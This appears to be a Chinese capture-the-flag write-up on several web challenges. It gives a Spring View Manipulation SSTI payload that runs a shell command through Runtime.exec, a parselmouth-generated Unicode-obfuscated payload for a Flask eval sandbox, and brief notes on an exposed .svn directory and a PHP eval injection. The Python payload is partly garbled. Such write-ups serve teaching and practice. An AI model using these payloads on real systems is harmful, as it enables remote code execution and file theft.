目录。

input_data 。

admin。

flask 。

FLAG这么多。

一夜醒来，全国CTF水平提高了1000倍😋

input_data 。

访问./.svn后，随便翻一翻，拿到flagg 。

admin。

dirsearch扫出 。

 。

访问./error看起来像java框架。

 。

 测出来是/admin;/路由打Spring View Manipulation(Java)SSTI。

https://www.veracode.com/blog/secure-development/spring-view-manipulation-vulnerability。

payload:。

/admin;/?path=__${ new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("cat /flag").getInputStream()).next()}__::.x。

 。

flask 。

题目附件。

from flask import Flask, request, Responseimport randomimport reapp = Flask(__name__)@app.route('/')def index():    evalme = request.args.get('evalme')    if ((not evalme) or re.search(r'[A-Zd-z\\. /*$#@!+^]', evalme)):        return 'hacker?'    with open(eval(evalme), 'rb') as f:        return Response(f.read())if __name__ == '__main__':    app.run(port=8080)。

用这个。

用这个。

GitHub - Macr0phag3/parselmouth: 自动化的 Python 沙箱逃逸 payload bypass 框架 / Automated Python Sandbox Escape Payload Bypass Framework。

python parselmouth.py --payload "'/flag'" --rule "__" "." "'" '"' "read" "chr" "\\" "/" "*" "$" "#" "@" "!" "+" "^" "A" "B" "C" "D" "E" "F" "G" "H" "I" "J" "K" "L" "M" "N" "O" "P" "Q" "R" "S" "T" "U" "V" "W" "X" "Y" "Z" "d" "e" "f" "g" "h" "i" "j" "k" "l" "m" "n" "o" "p" "q" "r" "s" "t" "u" "v" "w" "x" "y" "z"

 删除空间，得到paylodad:。

?evalme=𝒈𝒆𝒕a𝒕𝒕𝒓(𝒔𝒕𝒓(),𝒈𝒆𝒕a𝒕𝒕𝒓(𝒔𝒕𝒓(),𝒎a𝒙(𝒅𝒊c𝒕(𝒋𝒐𝒊𝒏=())(𝒎);a𝒑(𝒄𝒉𝒓,[106,111，105，110])(𝒎);a𝒑(𝒄𝒉𝒓,[47、102、108、97、103])。

FLAG这么多。

这么多FLAG。

初始界面有提示。

访问./F1aaj.php 。

看cookie。

 访问./FLLL4g.php。

 。

简单的php bypass，最后，eval代码注入变量覆盖弱 。